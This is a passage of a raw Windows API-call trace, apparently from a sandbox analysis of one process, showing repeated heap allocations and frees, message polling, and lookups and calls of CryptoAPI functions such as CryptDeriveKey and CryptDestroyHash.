[0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0233.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0233.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0233.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0233.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0233.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0233.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.401] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0233.401] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0233.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0233.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0233.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51538, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0233.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.406] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0233.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.406] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0233.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0233.408] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b48 [0233.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0233.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0233.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0233.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0233.410] CryptDestroyHash (hHash=0xa87290) returned 1 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0233.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, 